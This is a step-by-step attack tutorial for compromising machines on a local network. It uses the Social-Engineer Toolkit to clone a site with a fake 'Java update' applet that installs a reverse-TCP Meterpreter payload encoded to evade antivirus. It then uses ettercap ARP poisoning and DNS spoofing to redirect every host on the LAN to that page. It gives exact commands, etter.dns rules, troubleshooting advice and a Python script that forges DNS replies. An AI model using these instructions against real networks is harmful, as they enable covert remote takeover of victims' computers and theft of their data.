How to get into local machines using SET + ETTERCAP

Step 1: Setting up the Fake-Page

A. Start SET

B. Choose Website Attack Vectors by typing 1

C. Choose Java Applet Attack

D. Here choose Custom Import, so you can use this script to clone the site into which you want to inject the drive-by,
so that you can edit the content of the cloned page before SET does its evil stuff with it :P. I cloned a page, for example, and after cloning I edited index.html, changing the "JAVA + YOU, DOWNLOAD TODAY" part to something like "IMPORTANT JAVA UPDATE". You don't have to use this option; you can simply use the Site Cloner from SET, too.

E. After choosing your site, you have to choose the payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) here, or, if you know that your target runs a 64-bit operating system, choice 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.
F. Now you have to choose the encoding of the payload, so that it does not get detected by the victim's AV (this is encoding/packing of the executable, not encryption). Just choose 16 (Backdoored Executable), which is currently the best option. Detection changes with every signature update, so test the generated executable against the target's AV product before relying on it.

G. SET now sets up a Metasploit listener, which shows you when someone has run your Java drive-by. You MUST keep this window open: the listener lives in it, and a victim's session has nowhere to connect back to if it is closed.

Step 2: Use ettercap to redirect the target(s) to your fake site

a. The first thing to do is open the etter.dns file, which is located in /usr/share/ettercap on the ettercap version used here (newer packages install it as /etc/ettercap/etter.dns). Delete everything in it, and if you want to redirect every site your target visits, write the following into it:

* A yourip

If you only want to redirect one page, write this:

thesiteyouwanttoredirect A yourip

So in my specific case the etter.dns file looks like this (everything gets redirected to my fake page):

* A

b. Running ettercap

After configuring everything, you can now run the following command:

ettercap -T -q -P dns_spoof -M arp // //

This poisons the whole local network, which means that every PC on your LAN gets redirected to your fake page.
If you want to redirect only one single PC, run this instead:

ettercap -T -q -P dns_spoof -M arp /ipofyourvictim/ //

(On ettercap 0.8 and later the target specification has four fields, MAC/IPs/IPv6/PORTs, so write /ipofyourvictim// // there; the older three-field form above fails with an error about the number of tokens in TARGET. If ettercap picks the wrong network interface, add -i <interface>.)

And here is what the parameters actually mean:
-T means text-only interface, so you get no GUI and no ncurses screen
-q means quiet mode: ettercap does not print the contents of every packet it sniffs, which is really noisy
-P dns_spoof means load the dns_spoof plugin, which is responsible for the redirecting: it watches the DNS queries that now flow through your machine and races a forged reply, built from etter.dns, back to the victim before the real DNS server's answer arrives
-M arp means ARP-poisoning man-in-the-middle: the targets are tricked into sending their traffic through your PC first

Two things silently break the redirect: the victim's OS and browser cache DNS answers, so a host the victim resolved before you started keeps its real address until that cache entry expires; and the cloned page is served over plain HTTP, so a site the victim reaches via https:// (or one already in the browser's HSTS list) ends in a certificate error or a refused connection instead of your page.
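To show what the dns_spoof step actually does on the wire, here is an added Python model. It is not ettercap's code and not from this post: it reads etter.dns-style rules (generalizing the two cases above, `*` and a single name, to any glob pattern), parses a raw DNS query like the one the victim's resolver sends, and builds the forged A-record reply that the plugin races back to the victim. The rule file, the query, the transaction ID and the 10.0.0.5 / 192.168.1.50 addresses are constructed for the example.

```python
import fnmatch
import ipaddress
import struct

# Constructed etter.dns-style rules for the example (not from the post):
# one exact name, then a catch-all, exactly the two forms shown above.
SAMPLE_ETTER_DNS = """\
# comments and blank lines are ignored
update.example.com   A   10.0.0.5
*                    A   192.168.1.50
"""


def parse_etter_dns(text):
    """Return [(pattern, ip), ...] from 'name A ip' lines, in file order."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3 or parts[1].upper() != "A":
            continue                      # only A records are modelled here
        name, _, ip = parts
        ipaddress.IPv4Address(ip)         # raises ValueError on a mistyped address
        rules.append((name.lower().rstrip("."), ip))
    return rules


def lookup(rules, qname):
    """IP of the first rule whose glob pattern matches the queried name, or None."""
    qname = qname.lower().rstrip(".")
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(qname, pattern):
            return ip
    return None


def build_query(txid, name, qtype=1):
    """A minimal standard query (RD set) for one name, as a stub resolver sends it."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    """Return (txid, name, qtype, qclass, raw_question) for a single-question query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!6H", pkt[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    labels, off = [], 12
    while True:
        ln = pkt[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compressed name in question section")
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, ".".join(labels), qtype, qclass, pkt[12:off + 4]


def forge_response(query, rules, ttl=300):
    """Forged reply for a matching A/IN query, else None (the plugin stays silent)."""
    txid, qname, qtype, qclass, question = parse_query(query)
    if qtype != 1 or qclass != 1:
        return None
    ip = lookup(rules, qname)
    if ip is None:
        return None
    # Same transaction ID as the query; flags 0x8180 = response, RD, RA; 1 question, 1 answer.
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)
    # Answer RR: name is a pointer to the question at offset 12, TYPE A, CLASS IN, TTL, RDLENGTH 4.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + answer


if __name__ == "__main__":
    rules = parse_etter_dns(SAMPLE_ETTER_DNS)
    reply = forge_response(build_query(0x1234, "www.example.com"), rules)
    print(reply.hex())
```

The forged reply is only accepted because the transaction ID (and, on the real wire, the UDP source port) matches the query and because it arrives before the genuine answer; the ARP poisoning in Step 2 is what puts ettercap in a position to see the query first and win that race. A query for a name with no matching rule, or for a record type other than A, gets no forged answer and goes through untouched.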

